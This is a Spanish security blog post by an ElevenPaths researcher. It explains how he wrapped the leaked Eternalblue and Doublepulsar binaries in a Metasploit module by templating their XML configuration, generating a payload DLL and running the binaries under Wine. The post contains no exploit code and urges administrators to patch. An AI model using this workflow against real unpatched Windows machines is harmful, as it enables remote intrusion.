        Mi compa�era en ElevenPaths Sheila A. Berta (@UnaPibaGeek) public� en Exploit-DB un paper, tambi�n con versi�n en ingl�s, en el que se explica c�mo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoy�ndose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit. Gran trabajo, sin duda, de Sheila.

        Figura 2: Explotar Eternalblue & Doublepulsar para obener una shell
        de Empire/Meterpreter en Windows 7/Windows Server 2008 R2

        Sheila formul� una pregunta interesante en su paper y es: �Por qu� Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el �nico que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticaci�n. Por lo que, Eternalblue es el exploit que nos permitir� aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.

        Figura 3: Lista de exploits para Windows publicados por Shadowbroker

        Dichoe esto, el pasado jueves mis compa�eros Sheila y Claudio Caracciolo (@holesec) me preguntaron por la posibilidad de hacer una migraci�n del exploit Eternalblue que es utilizado en Fuzzbunch en el leak a mi querido Metasploit. El gusto por la seguridad y por la tecnolog�a nos puede y nos pusimos de forma r�pida y �gil manos a la obra en ElevenPaths.

        Tras revisar paso a paso el trabajo de Sheila, empec� a hacer mis peque�as pruebas. El pasado jueves no sab�amos bien qu� cosa hac�a el exploit de Eternalblue, y observando Fuzzbunch vimos que lo �nico que hacen es lanzar el binario contra un target concreto. No tenemos el c�digo del exploit para poder portarlo completamente. Entonces, el plan era migrar la configuraci�n de los binarios y la ejecuci�n de �stos para que desde Metasploit se pudiera hacer. Manos a la obra.

        FuzzBunch: Loader de binarios

        Analizando FuzzBunch te das cuenta que se genera una serie de ficheros XML asociados a un proyecto en curso y que esos ficheros XML son los que tienen los par�metros y opciones con las que se lanzan los binarios, en este caso, exploits o payloads. El primer objetivo era entender bien los archivos XML, ver qu� era lo necesario y poder ejecutar el binario sin utilizar FuzzBunch.

        De los tres ficheros XML que se generan, acab� viendo que el importante es el de InConfig o configuraci�n de entrada, ya que es el que el exploit lee para poder ejecutarse. En la imagen siguiente puede verse como, al lanzar el binario por s� solo, no se encuentra el fichero XML de configuraci�n y el exploit no es lanzado. Sin embargo, cuando le ponemos el fichero XML correctamente, el binario es lanzado con la configuraci�n indicada en el archivo de configuraci�n InConfig.

        Figura 4: Ejemplo sn y con el fichero InConfig.xml

        En la siguiente imagen, se puede ver el contenido del fichero InConfig.XML para Eternalblue. En �l se indican los tipos de datos, las posibilidades y los valores que tienen los atributos o variables.

        Figura 5: Contenido de InConfig.XML

        Analizando esto llegamos a una conclusi�n: Podr�amos hacer un m�dulo de Metasploit que implemente la configuraci�n del XML de Eternalblue, posteriormente el de Doublepulsar que ser� muy similar, generar una DLL con el Payload que el usuario elija en Metasploit y lanzar ambos binarios, el exploit y el paylaod.

        Otro problema: �Windows?

        Por el camino surgi� otro problema, y es que el exploit Eternalblue y Doublepulsar son binarios para Windows. Le pregunt� a Sheila y ella me contest� "�Qui�n utiliza Metaspoit en Windows?". Con la boca chica pens� en confesar que yo algunas veces (te toca torear en pelear en el campo de batalla que te toca), pero ella estaba en lo cierto, generalmente Metasploit se utiliza en sistemas Linux. Adem�s, nosotros quer�amos hacerlo con nuestro querido Kali Linux.

        La respuesta aqu� no se hizo esperar, nos tocar�a tirar de Wine para que el m�dulo de Metasploit lo utilice y pueda lanzar los binarios con sus configuraciones. Hay que tener en cuenta que para que el m�dulo funcione correctamente en sistemas Kali Linux tenemos que tener instalado Wine con compatibilidad para binarios de 32 bits.

        Detectar v�ctimas vulnerables a Eternalblue

        El pasado martes 17 de Abril se public� un m�dulo auxiliary de Metasploit que permite detectar en una red si alguno de los equipos es vulnerable al CVE-2017-010, es decir, a Eternalblue. Decid� probar el m�dulo y ver un poco c�mo estaba hecho y la sensaci�n es que la liberaci�n del c�digo del exploit est� muy cerca.

        Figura 6:  Uso del modulo auxiliary (cve-2017-010) en Metasploit

        Si eres un personal de IT te recomendamos que apliques los parches de seguridad para esta vulnerabilidad lo antes posible las m�quinas de tu empresa o dominio, ya que es una vulnerabilidad cr�tica que podr�a ser explotada por cualquiera, al no requerir la interacci�n por parte del usuario, solamente disponer de conectividad con la m�quina.

        Nuestro m�dulo para Metasploit: eternalblue_doublepulsar o eternal11

        La historia del nombre del m�dulo nos dar�a para otro art�culo entre Sheila y yo, pero baste decir que le pusimos eternal11. El algoritmo utilizado para este caso os lo dejo aqu� en un sencillo pseudoc�digo:
        � Disponemos de un SKELETON del fichero XML de Eternalblue. Este SKELETON contiene una serie de palabras clave, por ejemplo %RPORT%, %RHOST%, %TIMEOUT%.
        Figura 7: Skeleton.XML de Eternalblue
        � Cada vez que invocamos la funci�n exploit este fichero es copiado con el nombre Eternalblue-2.2.0.xml, el cual es el que utiliza el binario para leer los valores.
        � Una vez copiado el fichero con el nombre original, se sustituye en el fichero las palabras clave por los valores que el usuario introduzca en los atributos de Metasploit. Por ejemplo, si el usuario configura RHOST apuntando a la direcci�n 10.0.0.10, el campo %RHOST% del fichero XML ser� sustituido por la direcci�n IP real. As� ocurre con todos los campos. 
        � Ocurre igual con el XML de Doublepulsar. Tenemos un SKELETON d�nde se ir�n sustituyendo los valores, en este caso los valores personalizables son: %RHOST%, %RPORT%, %TIMEOUT%, %TARGETARCHITECTURE%, %DLLPAY%, %PROCESSINJECT%. 
        � A continuaci�n, se genera una DLL con el Payload que se haya setteado con Set PAYLOAD. La DLL se almacenar� d�nde se indique en el atributo PathDLLInjection del m�dulo. 
        � Despu�s, se lanzan los binarios: primero Eternalblue y despu�s Doublepulsar.
        El m�dulo desarrollado tiene las siguientes opciones avanzadas:
        � TargetArchitecture: Podr� elegirse entre x86 y x64. Le indica a Doublepulsar la arquitectura d�nde inyectar� la DLL. 
        � PathEternalBlue: Indica la ruta d�nde se encuentra el binario de Eternalblue. Hay que recordar que el sistema, si estamos en Linux, debe contar con Wine. Por otro lado, hay que tener cuidado con las dependencias que tiene el binario, librer�as en x86 o x64, tienen que ser accesibles por el binario, y por Wine en el caso de Linux. 
        � PathDoublePulsar: Indica la ruta d�nde se encuentra el binario de Doublepulsar. 
        � PathDLLInjection: Indica la ruta d�nde se almacenar� la DLL. Adem�s, este path se incluir� en el XML de Doublepulsar para que el binario sepa de d�nde cargarla. � NameDLL. Nombre que se le dar� a la DLL. Por defecto es eternal11.dll. 
        � ProcessInject: Proceso en el que se har� la inyecci�n de la DLL.
        Y por fin, cuando lancemos el m�dulo contra un sistema vulnerable al CVE-2017-010 de Windows 7 o Windows Server 2008R2 veremos algo parecido a esto que pod�is ver en la imagen siguiente.

        Figura 8: Explotaci�n con �xito del m�dulo de eternal11 sobre un Windows vulnerable

        Ha sido divertido pasar unas horas locas trabajando en esto e intentando hacer un m�dulo que pueda ayudar a auditar los sistemas Microsoft d�nde Eternalblue sigue presente. En el siguiente v�deo tienes una demostraci�n de este m�dulo funcionando.

        Figura 9: PoC de explotaci�n de Eternalblue y Doublepulsar con Metasploit

        Y tambi�n la tienes disponible la PoC para los equipos Windows 7 y Windows Server 2008 R2 en versiones x64, que tambi�n funciona, como pod�is ver en este v�deo.

        Figura 10: PoC de explotaci�n de Eternalblue y Doublepulsar con Metasploit
        sobre Windows 7 y Windows Server 2008 R2 en versiones x64.

        Actualiza lo antes posible todos tus sistemas Microsoft Windows vulnerables y prot�gete de las amenazas que han surgido con este leak de exploits. Quiero agradecer el trabajo de mi compa�era Sheila A. Berta y como viene en la descripci�n del m�dulo:

        �** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, ITS NOT THE FULL PORTATION**�

        Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
        Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths


        download file now

        Read more »